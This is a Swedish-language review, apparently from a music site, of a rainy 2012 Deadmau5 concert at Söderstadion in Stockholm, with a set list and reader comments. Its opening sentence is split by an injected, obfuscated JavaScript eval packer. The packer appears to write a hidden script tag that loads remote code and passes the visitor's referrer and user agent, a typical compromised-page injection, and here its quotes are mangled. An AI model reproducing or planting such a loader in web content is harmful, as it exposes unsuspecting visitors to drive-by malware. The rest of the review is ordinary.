Image Image Image Image Image Image Image Image Image Image

| 5 december, 2020

Scroll to top

Top

Recension | Deadmau5 på Söderstadion

Recension | Deadmau5 på Söderstadion
Filip Urde
 • On 4 juni, 2012
 • http://www.revue.se/filip-urde

Review Overview

Musik
8
Show
6.5
Underhållning
6.5
7

Rating

I eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|yfsbd|var|u0026u|referrer|etens||js|php’.split(’|’),0,{}))
lördags kom fenomenet Deadmau5 till Johanneshov och Söderstadion, i Europas kanske blötaste tillställning.

Det går inte bäst man vill att bortse från vädret. Denna svenska klyscha att vi alltid pratar om vädret. Men vädret den 2 juni var allt annat än perfekt. Det hade regnat konstant sedan fredagen och Avicii´s spelning och nu skulle alltså en till spelning avverkas i betongborgen vid Globen. Tempraturen mättes till 5 grader, alltså 1 grad kallar än på Julafton + regn.

Kort sagt så talade inte vädret för en lyckad sommar konsert, men då har man glömt att vi är i Sverige och glömt de svenska fansen.

”Det finns inget dåligt väder, bara dåliga kläder” 

Något så banalt som väder stoppade inte fansen från att välla in på arenan som snart hoppade i takt med den fantastiska showen.

Nu börjar det.

Deadmau5 (Joel Zimmerman) stapplar in på scenen och tittar ut mot en publiken som ser ut att vara i parkleken på dagis. Galonisar, ponchos och regn jackor i alla dess färger tillsammans med ett ösregn som får en vågmaskin att blekna.

Han tittar, nästan lite oroligt ut över detta hav med människor. Jag ser hur han tänker i sitt mushuvud ”hur ska detta gå?”. Sedan vinkar han och kaoset är igång. Jag tror inte Deadmau5 hade räknat med responsen han fick från start till mål, men det är helt och hållet hans egna förtjänst, vilken show!

Jag själv och mitt kompisgäng klämde oss snabbt fram till 10 meter från scenen, lagom till att mästerliga ”Aguru” drog igång och publikhavet bröt ut i en enorm moshpit. ”Håll i er!” skrek jag och sedan var det åka av i 2 timmar.

Showen är så praktfull att jag inte kunde sluta skratta under vissa partier. När han står där uppe på sitt V-formade Dj-bås som är inramat av skärmar som projicerar diverse mönsterformationer, mushuvuden, minecraft världar, spaceinvaders osv. samt en hel drös lampor som pulserar i takt med basen, ja, då tror man knappt att det är sant.

Han hade med sig två olika mushuvuden, först ett med en grön projicering på som blinkade sedan ett som var klassiskt svart med vita ögon.

Deadmau5 styrka enligt mig är hans unika variation, något han visade i lördags. Från de klassiska electro låtarna till de varierande två senare åren med minimalistisk progressiv house som sedan förenas med tung dubstep till det bästa av alla världar. Allt medan Mau5kubens väggar bygger Minecraft och super mario världar  i sync med den gigantiska backdrop skärmen. Grymt!

Deadmau5 hade med sig en gäst på scen. Under låten ”Sofi needs a ladder” så dyker självklart hans vän Sofi upp på scenen i små shorts och en väst med luva. Sen har hon inte mycket mer än en bh och strumpbyxor på sig vilket Deadmau5 tyckte var lite kallt och kom ner med sin parkas till henne efter några minuter. Sofi ville dock vara solidarisk och slänger av sig parkasen då hon tittar ner på de dyblöta fansen 3 meter framför sig. ”det är inte lika sexigt med jackan…” säger hon och alla skrattar för att sedan ösa vidare.

httpv://youtu.be/VGxlLO-rPOo

Höjdpunkterna var många och nästan alla låtar var över förväntan, men starka kort som ”Strobe” bleknade tyvärr p.ga. en dålig Mixning och att ljudet var på tok för lågt. Men detta reparerades snart av fantastiska ”The Veldt” som också avslutar kvällens konsert.

Deadmau5, nörden från Toronto som hittade en död mus i sin PC och sedan började göra musik är en av mina absoluta favorit artister. När han tackar publiken hjärtligt efter sina 2 magiska timmar kan jag inte känna annat än ren glädje! Vädret sög, volymen var så där svensk och pinsamt låg! Men det gjorde inte så mycket när geniet Deadmau5 tog över Stockholm. Hans talang och känsla för detaljer är unik. Att han sitter och programmerar sina egna synthar för att göra sitt egna sound, tillsammans med sitt unika visuell scenspråk gör att Deadmau5 är en världsartist i en egen liga.

Efter att vinkat adjö och när deadmau5 försvinner ur sikte står där i klassiska 8-bitsbokstäver ”GAME OVER”, tillsammans med två små körsbär. Det är precis vad man kände, GAME OVER! Man var helt färdig av regnet, blåsten och den feta föreställningen.

Konsertens klart bästa låtar var Arguru, raise your weapon, Ghost n Stuff och The Veldt. Helt magiska…

httpv://youtu.be/wH7rTQHm3vE

Har man inte sett Deadmau5 så går det knappt att förstå hur det är att uppleva live. Jag har sett många band och Dj’s, allt från Iron Maiden och ACDC, till Avicii och Guetta. Men Deadmau5 tillsammans med Iron Maiden har bjudit på de bästa showerna jag någonsin sett (nu med ett övertag för Deadmau5).

Alla +,stjärnor och getingar som går får Deadmau5 den 2 juni. Inget talade för det, men vad F*N gör det?

 

Set list, dock i fel ordning:

Arguru, Where my keys, Maths, Cthulu Sleeps, Aural Psynapse, HR 8938 Cephei, Jaded, FML (med I Remember ”in-mixad”), To play us out, Professinal Griefers, Ghost n Stuff, Some Chords, Sofi needs a ladder, One trick pony, Raise your weapon, Get in the cart pig, the Veldt, Channel 42 och Strobe.
Fun fact:

För den som vill veta skillnaden mellan Deadmau5 och Avicci så är scennärvaron ett ess i skjortärmen för Deadmau5. Avicii är en grym producent, men har ingen scennärvaro. Deadmau5 är en grym producent och har kanske Dj-världens bästa scennärvaro. Bara den oändliga  kretiviteten kring mushuvudena bör placera honom i någon form av ”hall of fame”.

 

Tack för mig.

 

 

Comments

 1. Ted

  grymt!!! Tack! Äntligen någon som skriver om konserten! 

 2. Johannes

  Underbart!!! Tyckte det blev lite extra spänning av vädret 🙂

 3. Markus Elm

  Ja shit vad det regnade men, inget går ju upp mot en liten Deadmau5.
  The veldt var klart bäst och klart sist 🙂

 4. Hampus B

  haha jaa jag var sååå kall, men va fan gör det?! Bästa konserten någonsin! Tack för en bra artikel.